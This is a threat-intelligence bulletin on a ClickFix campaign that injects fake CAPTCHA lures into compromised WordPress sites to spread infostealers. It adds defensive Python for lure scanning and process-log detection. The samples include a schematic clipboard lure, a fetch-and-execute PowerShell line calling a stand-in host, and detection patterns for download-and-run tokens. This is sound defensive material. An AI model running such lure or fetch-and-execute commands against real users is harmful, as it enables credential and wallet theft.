Compromised WordPress Sites Deliver ClickFix Attacks in Global Infostealer Campaign
Summary:
Rapid7 Labs has identified an active, large-scale campaign in which an unidentified threat actor is compromising legitimate WordPress websites to deliver ClickFix-style credential and digital wallet stealers to unsuspecting visitors.
Active in its current form since December 2025, the campaign has infected more than 250 distinct websites across at least 12 countries, including regional news outlets, local businesses, and at least one U.S. Senate candidate's official webpage.
Compromised sites inject a malicious JavaScript snippet that presents visitors with a convincing fake Cloudflare CAPTCHA, which prompts them to execute a PowerShell command copied to their clipboard. This initiates a multi-stage in-memory infection chain dubbed "DoubleDonut," consisting of two sequential Donut shellcode loaders, which ultimately delivers one of several infostealer payloads:
- An evolved variant of Vidar Stealer with encrypted C2 configurations.
- An unnamed .NET stealer Rapid7 is calling Impure Stealer.
- A newly identified custom C++ stealer dubbed VodkaStealer.
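The lure described above combines three things in one injected snippet: a script that writes to the visitor's clipboard, fake verification text telling the visitor to open Run, paste and press Enter, and a shell command string. A site owner can look for that combination in served pages. The scanner below is an added example written for this summary; it is not Rapid7's code and does not reproduce the campaign's actual snippet. The two sample pages, the signal names, the regular expressions and the threshold of three signals are constructed assumptions, and the lure page's command string is deliberately a placeholder.

```python
"""Heuristic scanner for ClickFix-style lures injected into WordPress pages.

Added example, not code from Rapid7 or from the campaign. Each page is scored
on four independent signals; a legitimate "copy link" button hits only the
clipboard signal and stays below the threshold.
"""
import re
from html.parser import HTMLParser

# Script writes to the clipboard (both modern and legacy APIs).
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
# A shell host named inside script code.
SHELL_REF = re.compile(r"\b(powershell|pwsh|cmd\.exe|mshta)\b", re.I)
# "Open Run, paste, press Enter" style instructions (in text or built by script).
RUN_INSTRUCTIONS = re.compile(
    r"win(dows)?\s*\+\s*r|ctrl\s*\+\s*v|press\s+enter|run\s+dialog", re.I)
# Fake verification wording; checked in visible text and in script-built markup.
CAPTCHA_LURE = re.compile(r"verify\s+you\s+are\s+(a\s+)?human|cloudflare", re.I)


class _PageParts(HTMLParser):
    """Collect inline script bodies and visible text separately."""

    def __init__(self):
        super().__init__()
        self.scripts, self.text = [], []
        self._in_script = self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)
        elif not self._in_style:
            self.text.append(data)


def score_page(html):
    """Return (score, matched_signal_names) for one HTML document."""
    parts = _PageParts()
    parts.feed(html)
    scripts = "\n".join(parts.scripts)
    text = " ".join(parts.text)
    signals = []
    if CLIPBOARD_WRITE.search(scripts):
        signals.append("clipboard_write")
    if SHELL_REF.search(scripts):
        signals.append("shell_string_in_script")
    if RUN_INSTRUCTIONS.search(text) or RUN_INSTRUCTIONS.search(scripts):
        signals.append("run_paste_instructions")
    if CAPTCHA_LURE.search(text) or CAPTCHA_LURE.search(scripts):
        signals.append("captcha_lure_text")
    return len(signals), signals


def is_clickfix_lure(html, threshold=3):
    """True when enough independent signals co-occur (threshold is an assumption)."""
    return score_page(html)[0] >= threshold


# Constructed sample: a normal page with a legitimate copy-link button.
CLEAN_PAGE = """<html><body><h1>Local news</h1>
<button onclick="copyLink()">Copy link</button>
<script>function copyLink(){ navigator.clipboard.writeText(location.href); }</script>
</body></html>"""

# Constructed schematic of an injected lure; the command string is a placeholder.
LURE_PAGE = """<html><body><h1>Local news</h1>
<script>
document.body.innerHTML += '<div>Verify you are human<br>1. Press Win + R'
  + '<br>2. Press Ctrl + V<br>3. Press Enter</div>';
navigator.clipboard.writeText("powershell <<PAYLOAD OMITTED>>");
</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("lure", LURE_PAGE)):
        print(name, score_page(page), "flag" if is_clickfix_lure(page) else "ok")
```

Run it against a crawl of the site's own rendered pages (including cached copies, since the injection may be conditional on referrer or user agent); a hit on the threshold is a reason to diff the page against a clean backup and audit the theme and plugin files that emit it.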
Security Officer Comments:
The primary impact is credential theft and financial loss, with stolen browser credentials potentially enabling downstream attacks against organizations whose employees visited a compromised website. Because the infected sites are legitimate, trusted domains rather than obvious phishing infrastructure, victims are significantly less likely to exercise caution, making the social engineering highly effective.
The use of three distinct infostealer families, including a newly developed custom variant, suggests the threat actor is actively evolving their payload strategy, potentially through LLM-assisted development; the scale of over 250 compromised sites, achieved through automation-driven WordPress compromise, indicates a well-resourced and ongoing criminal operation.
Stolen credentials can enable impersonation, lateral movement, ransomware pre-positioning, or further propagation of the ClickFix lures.
Suggested Corrections:
WordPress administrators should prioritize hardening their installations immediately by auditing all plugins and themes for outdated or vulnerable versions, enforcing strong and unique administrative passwords, enabling multi-factor authentication on all admin accounts, and restricting public access to the wp-admin login interface where operationally feasible.
Avoiding execution of untrusted code on devices with saved browser credentials is also critical to preventing credential compromise in the event of a ClickFix encounter.
For end users and enterprise defenders, security awareness training should be updated to include ClickFix tactics, specifically the social engineering technique of prompting users to paste and execute clipboard-delivered commands under the guise of CAPTCHA verification.
Additionally, disabling the Windows Run dialog shortcut (Win+R) can reduce the ease of executing pasted ClickFix commands, though defenders should note this does not fully block terminal or Explorer-based execution paths.
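Because disabling Win+R leaves the Explorer address bar and terminal paths open, endpoint detection should key on the process lineage and command line rather than on the Run dialog alone. The rule below is an added example, not Rapid7's detection content: it reads constructed process-creation records (the field names follow the Sysmon event 1 convention, but the log format, sample values and the heuristic token list are assumptions) and flags a shell host that both descends from an interactive parent and carries fetch-and-execute tokens, which is the shape a pasted ClickFix command takes whichever way it was launched.

```python
"""Detect pasted shell commands from process-creation records.

Added example, not Rapid7's rule. Records are one-per-line key=value pairs
(quoted when the value has spaces); the sample log is constructed.
"""
import re

LOG_RECORD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Parents that mean a human typed or pasted the command interactively.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe", "openconsole.exe"}
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Download-and-run primitives typical of clipboard-delivered one-liners (heuristic).
FETCH_EXEC = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|frombase64string)\b|(?:^|\s)-enc\w*", re.I)


def parse_record(line):
    """Parse one key=value record into a dict."""
    return {k: q if q else b for k, q, b in LOG_RECORD.findall(line)}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(rec):
    """Return a reason string when the record matches the pattern, else None."""
    image = basename(rec.get("Image", ""))
    parent = basename(rec.get("ParentImage", ""))
    cmdline = rec.get("CommandLine", "")
    if image not in SHELL_HOSTS or not FETCH_EXEC.search(cmdline):
        return None
    if parent == "explorer.exe":
        # Covers Win+R, the Explorer address bar and double-clicked files alike.
        return "fetch-and-execute shell launched from explorer.exe"
    if parent in INTERACTIVE_PARENTS:
        return "fetch-and-execute shell launched from an interactive terminal"
    return None


def scan(log_text):
    """Return (timestamp, user, reason) for every matching record."""
    hits = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = parse_record(line)
        reason = classify(rec)
        if reason:
            hits.append((rec.get("ts"), rec.get("User"), reason))
    return hits


# Constructed sample records; the suspicious command lines use placeholders.
SAMPLE_LOG = r'''
ts=2026-01-15T10:02:11Z User=CORP\jdoe ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -c iex (irm http://lure.invalid/[omitted])"
ts=2026-01-15T10:05:40Z User=CORP\jdoe ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell"
ts=2026-01-15T11:17:03Z User=CORP\asmith ParentImage="C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe" Image="C:\Program Files\PowerShell\7\pwsh.exe" CommandLine="pwsh -enc [omitted]"
ts=2026-01-15T12:00:00Z User="NT AUTHORITY\SYSTEM" ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -File C:\scripts\backup.ps1"
'''

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The second record (a plain interactive PowerShell from Explorer) and the fourth (a scheduled script under svchost.exe) are left alone, so the rule does not fire on ordinary administration; the first and third are raised regardless of whether the Run dialog was available.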
Link(s):
https://www.rapid7.com/blog/post/tr...compromise-advances-global-stealer-operation/